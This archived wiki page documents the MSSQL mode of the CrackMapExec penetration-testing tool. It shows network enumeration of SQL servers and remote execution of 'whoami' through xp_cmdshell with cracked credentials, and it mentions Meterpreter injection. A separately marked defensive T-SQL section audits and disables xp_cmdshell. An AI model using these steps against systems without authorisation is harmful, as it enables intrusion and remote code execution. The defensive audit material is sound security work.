This repository has been archived by the owner on Dec 6, 2023. It is now read-only.

MSSQL Mode

byt3bl33d3r edited this page Mar 13, 2016 · 8 revisions

# MSSQL Mode

As of CME version 2.3, you're now able to discover, authenticate to, and execute queries and commands through TCP-enabled MSSQL databases!

Additionally, if the account you're authenticating as has enough privileges, you can execute commands on the underlying system by using xp_cmdshell!

The --mssql option switches CME into MSSQL Mode: any additional option you now provide will be executed and/or enumerated through the MSSQL DB!

In this example, we try to enumerate all available TCP-enabled MSSQL DBs on the network:

```
#~ python crackmapexec.py 192.168.0.0/24 --mssql
03-12-2016 18:56:42 SMB 192.168.0.103:445 DC1        [*] Windows 6.3 Build 9600 (name:DC1) (domain:LAB)
03-12-2016 18:56:42 SMB 192.168.0.104:445 WIN10BOX   [*] Windows 10.0 Build 10586 (name:WIN10BOX) (domain:LAB)
03-12-2016 18:56:45 SMB 192.168.0.106:445 WIN7BOX    [*] Windows 6.1 Build 7601 (name:WIN7BOX) (domain:LAB)
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX    [*] Found 1 MSSQL instance(s)
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX    Instance 0
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX    ServerName:WIN7BOX
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX    tcp:1433
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX    IsClustered:No
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX    Version:12.0.2000.8
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX    np:\\WIN7BOX\pipe\MSSQL$SQLEXPRESS\sql\query
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX    InstanceName:SQLEXPRESS
```

HA! As we can see from the output there's an MSSQL DB ripe for the pilfering available on 192.168.0.106!

Let's say that after using Responder we manage to get only a SQL Admin account hash, which we are able to crack. This account has very limited access on machines but has administrative access over MSSQL DBs.

Have no fear! CME is here!

The following example shows CME executing the whoami command by using xp_cmdshell:

```
#~ python crackmapexec.py 192.168.0.0/24 --mssql -u SQLAdmin -p password -x 'whoami'
03-12-2016 19:11:49 SMB 192.168.0.103:445 DC1        [*] Windows 6.3 Build 9600 (name:DC1) (domain:WIN7BOX)
03-12-2016 19:11:49 SMB 192.168.0.104:445 WIN10BOX   [*] Windows 10.0 Build 10586 (name:WIN10BOX) (domain:WIN7BOX)
03-12-2016 19:11:52 SMB 192.168.0.106:445 WIN7BOX    [*] Windows 6.1 Build 7601 (name:WIN7BOX) (domain:WIN7BOX)
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    [*] Found 1 MSSQL instance(s)
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    Instance 0
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    ServerName:WIN7BOX
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    tcp:1433
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    IsClustered:No
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    Version:12.0.2000.8
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    np:\\WIN7BOX\pipe\MSSQL$SQLEXPRESS\sql\query
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    InstanceName:SQLEXPRESS
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    [+] Login successful LAB\SQLAdmin:password
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    [+] Executed command via XP_CMDSHELL
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    output
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    --------------------------------------------------------------------------------
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    nt service\mssql$sqlexpress
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    NULL
```
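The xp_cmdshell path above depends on three things a DBA controls: the procedure being enabled (it is off by default), the login holding sysadmin (or explicit EXECUTE rights plus a proxy credential), and the service account whose identity the command runs under, which is why whoami printed `nt service\mssql$sqlexpress`. The following T-SQL, added here as an example and not part of CME or this wiki page, audits all three on an instance and turns xp_cmdshell back off; it assumes you run it as a sysadmin on the instance being checked.

```sql
-- Added example (not from CME or this wiki page): audit the preconditions for
-- command execution through xp_cmdshell on this instance, then disable it.
-- Assumes the caller is a member of sysadmin.

-- 1. Is xp_cmdshell enabled? value_in_use = 1 means the -x path shown above is open.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = N'xp_cmdshell';

-- 2. Which logins can call it? sysadmin members always can; anyone else needs
--    EXECUTE on xp_cmdshell plus the ##xp_cmdshell_proxy_account## credential.
SELECT sp.name AS login_name, sp.type_desc, sp.is_disabled
FROM sys.server_principals AS sp
WHERE sp.type IN ('S', 'U', 'G')            -- SQL logins, Windows logins and groups
  AND IS_SRVROLEMEMBER(N'sysadmin', sp.name) = 1;

-- 3. Whose identity does the command run under? This is the value whoami returned.
--    A dedicated low-privilege service account limits what that command can reach.
SELECT servicename, service_account, startup_type_desc
FROM sys.dm_server_services
WHERE servicename LIKE N'SQL Server (%';

-- 4. Disable xp_cmdshell (the default state on a fresh install) and confirm.
EXEC sp_configure N'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure N'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure N'show advanced options', 0;
RECONFIGURE;

SELECT name, value_in_use
FROM sys.configurations
WHERE name = N'xp_cmdshell';               -- expect value_in_use = 0
```

Every sp_configure change to xp_cmdshell also writes a line of the form "Configuration option 'xp_cmdshell' changed from 0 to 1" to the SQL Server error log, so that message is a cheap thing to alert on.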

We can then use the --inject option to execute shellcode or get a Meterpreter shell, again through the MSSQL DB!